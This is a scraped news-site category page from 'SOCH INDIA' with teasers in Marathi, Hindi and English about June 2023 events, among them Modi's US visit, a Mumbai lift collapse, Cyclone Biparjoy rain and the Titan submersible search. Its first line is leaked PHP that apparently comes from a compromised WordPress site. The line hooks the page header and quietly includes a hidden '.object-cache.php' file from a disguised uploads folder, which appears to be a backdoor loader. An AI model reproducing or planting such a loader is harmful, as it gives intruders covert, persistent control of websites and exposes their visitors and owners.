add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); देश – SOCH INDIA
Menu

Prime Minister Narendra Modi and U.S. President Joe Biden will deliver remarks and take questions from journalists on Thursday during the former’s state visit, a senior White House official called the event a “big deal”, as per news agency Reuters. Prime Minister Narendra Modi was accorded a ceremonial welcome...

Read More

आगामी लोकसभा निवडणुकीच्या (Lok Sabha Elections) अनुषंगाने राजकीय घडामोडींना वेग आला आहे. राज्यातील सर्वच महत्त्वाचे पक्ष लोकसभेच्या तयारीला लागले आहे. अशातच राज्यातील काही चर्चेतील लोकसभा मतदारसंघात आत्तापासूनच इच्छुकांच्या नावाची चर्चा सुरू झाली आहे. ज्यात मराठवाड्याची (Marathwada) राजधानी असलेल्या छत्रपती संभाजीनगर जिल्ह्याचा (Chhatrapati Sambhaji Nagar Distric) देखील समावेश आहे. गेल्यावेळी...

Read More

मला विरोधी पक्षनेते पदामध्ये काही इंटरेस्ट नव्हता. आता मला संघटनेत कोणतही पद द्या, मी त्या पदाला न्याय देईल, असे वक्तव्य राष्ट्रवादी काँग्रेसचे नेते अजित पवार यांनी केलेय. राष्ट्रवादी काँग्रेस पक्षाचा वर्धापनदिनाच्या सोहळ्यात अजित पवार यांनी संघटनेतील कोणतेही पद देण्याची मागणी पक्षाकडे केली आहे. अजित पवारांच्या या वक्तव्यानंतर राष्ट्रवादी काँग्रेसमध्ये...

Read More

CSMT नंतर अंधेरी रेल्वे स्थानकाचाही पुनर्विकास आराखडा तयार करण्यात आला आहे. रेल्वे स्थानक आणि परिसरातील मोकळ्या जागेचा निवासी आणि व्यावसायिक वापर करण्याचा मार्ग खुला करण्यात आला आहे. अंतिम प्रस्तावावर रेल्वे बोर्डाच्या मंजुरीची प्रतीक्षा करण्यात आली आहे. सीएसएमटीनंतर अंधेरी रेल्वे स्थानक पुनर्विकास आराखडा तयार करण्यात आला आहे. रेल्वे स्थानक आणि...

Read More

मुंबईतील (Mumbai) लोअर परेलमध्ये (Lower Parel) लिफ्ट कोसळल्याची (Lift Collapse) घटना घडली. सेनापती बापट मार्ग कमला मिल इथल्या ट्रेड वर्ल्ड इथे ही दुर्घटना घडली. सोळा मजल्याच्या या इमारतीमध्ये चौथ्या माळ्यावरुन ही लिफ्ट खाली कोसळल्याची माहिती आहे. यामध्ये नऊ जण जखमी झाले आहेत. त्यांना जवळच्या ग्लोबल आणि केईएम रुग्णालयात दाखल...

Read More

Vistara, a joint venture between Tata Sons and Singapore Airlines, has been ranked 16th worldwide, moving four places up from last year, at 2023 World Airline Awards by Skytrax. This makes Vistara the only Indian carrier to feature in the list of World’s Top 20 Airlines for the second...

Read More

देश की राजधानी में चक्रवात तूफान बिपरजॉय का असर देखने को मिला है. दिल्ली एनसीआर में प्री मानसून की बारिश हुई, जिससे भीषण गर्मी से लोगों को राहत मिली है. आसमान में अभी भी काले बादल छाए हुए हैं. बारिश के बाद ये हालात हो गए हैं कि गुरुग्राम...

Read More

दुनियाभर में अंतरराष्ट्रीय योग दिवस मनाया जा रहा है. भारत में भी तमाम जगहों पर अलग-अलग कार्यक्रम हो रहे हैं, जिनमें नेताओं से लेकर सेलिब्रिटी तक हिस्सा ले रहे हैं. तमाम हस्तियां ट्विटर पर देशवासियों को योग दिवस की शुभकामनाएं दे रहे हैं और अपनी फोटो पोस्ट कर उन्हें...

Read More

Amid the search for the submersible used for Titanic wreck exploration that went missing in the Atlantic Ocean along with its crew, the internal US Department of Homeland Security memos say that banging sounds could be heard for hours, as reported by CNN. “Additional acoustic feedback was heard and...

Read More

सीए भवानी देवी हिने तलवारबाजीमध्ये इतिहास रचलाय. आशियाई फेसिंग चॅम्पियनशीपमध्ये भवानी देवीने सध्याच्या वर्ल्ड चॅम्पियनचा पराभव करत भारताची मान उंचावली आहे. आशियाई फेसिंग चॅम्पियनशीपमध्ये भवानी देवीने एक पदक पक्के केलेय. या स्पर्धेत पदक पक्कं मिळवणारी भवानी देवी पहिली भारतीय तलवारबाज ठरणार आहे. टोक्यो ऑलम्पिकमध्येही भवानी देवीनं शानदार कामगिरी केली...

Read More